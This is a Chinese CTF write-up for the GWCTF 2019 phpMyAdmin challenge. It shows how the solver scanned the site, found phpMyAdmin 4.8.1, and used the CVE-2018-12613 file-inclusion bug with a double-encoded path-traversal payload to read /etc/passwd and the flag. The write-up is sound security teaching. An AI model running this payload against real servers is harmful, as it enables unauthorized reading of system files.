phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1

  • 开发
  • 69

打开题目

我们用dirsearch扫描一下后台看看

扫描结果如下

我们访问一下robots.txt看看,提示有phpinfo.php

那我们访问一下phpinfo.php

发现没有任何信息后我们转去看看phpmyadmin看看

成功访问到页面

在这里我们看到phpmyadmin的版本号是4.8.1

我们百度搜索一下看看

我们知道phpmyadmin4.8.1存在远程文件包含漏洞

输入​/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

可以看到能够成功执行

那我们尝试一下直接寻找flag

​/index.php?target=db_sql.php%253f/../../../../../../../../flag

直接就得到了flag

知识点:

CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现

参考:

phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)_phpmyadmin cve-2018-12613漏洞获取webshell-CSDN博客

 

阅读全部

相关推荐

  3. 31-1 文件包含漏洞 - 文件包含

    2023-12-20 07:04:03       41 阅读

  5. 文件包含漏洞讲解

    2023-12-20 07:04:03       69 阅读

  6. 文件包含漏洞

    2023-12-20 07:04:03       53 阅读

  8. 初探文件包含漏洞

    2023-12-20 07:04:03       45 阅读

  10. Xss文件包含漏洞

    2023-12-20 07:04:03       36 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-20 07:04:03       98 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-20 07:04:03       106 阅读

  9. 在Django里面运行非项目文件

    2023-12-20 07:04:03       87 阅读

  19. Python语言-面向对象

    2023-12-20 07:04:03       96 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2023-12-20 07:04:03       91 阅读

热门阅读

  1. 2023-12-19 AIGC-Stable Diffusion模型的下载方法汇总

    2023-12-20 07:04:03       187 阅读

  3. el-select二次封装实现可分页加载数据

    2023-12-20 07:04:03       61 阅读

  9. 【RocketMQ-Bug】RocketMQ 在使用中的常见问题

    2023-12-20 07:04:03       68 阅读

  20. Spring Boot测试 - JUnit整合及模拟Mvc

    2023-12-20 07:04:03       62 阅读

  22. ubuntu22.04制作pycharm的桌面快捷方式

    2023-12-20 07:04:03       56 阅读

  24. 单元测试框架jUnit

    2023-12-20 07:04:03       63 阅读

  27. 漫谈UNIX、Linux、UNIX-Like

    2023-12-20 07:04:03       48 阅读

  30. ModBus TCP

    2023-12-20 07:04:03       54 阅读